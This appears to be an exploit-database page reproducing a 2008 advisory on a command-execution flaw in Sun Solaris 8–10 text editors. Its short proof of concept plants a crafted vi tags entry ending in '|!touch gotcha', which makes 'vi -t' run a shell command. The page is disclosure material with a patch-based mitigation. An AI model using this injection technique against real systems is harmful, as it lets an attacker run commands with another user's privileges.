header-logo
Suggest Exploit
vendor:
Solaris Text Editors
by:
SecurityFocus
7.5
CVSS
HIGH
Command-Execution
78
CWE
Product Name: Solaris Text Editors
Affected Version From: Sun Solaris 8
Affected Version To: Sun Solaris 10
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Sun Solaris 8, 9, and 10
2008

Sun Solaris Text Editors Command-Execution Vulnerability

An attacker may leverage this issue to execute arbitrary commands with the privileges of another user on the affected computer.

Mitigation:

Apply the appropriate patches from the vendor.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/31229/info

Sun Solaris text editors are prone to a command-execution vulnerability.

An attacker may leverage this issue to execute arbitrary commands with the privileges of another user on the affected computer.

Sun Solaris 8, 9, and 10 are affected. 

$ echo "This is line 1" > file1
$ echo "file1line1<TAB>file1<TAB>:1|!touch gotcha" > tags
$ ls
file1   tags
$ vi -t file1line1
:q!
$ ls
file1   gotcha   tags
$

Navigation

Suggest Exploit

Services By CQR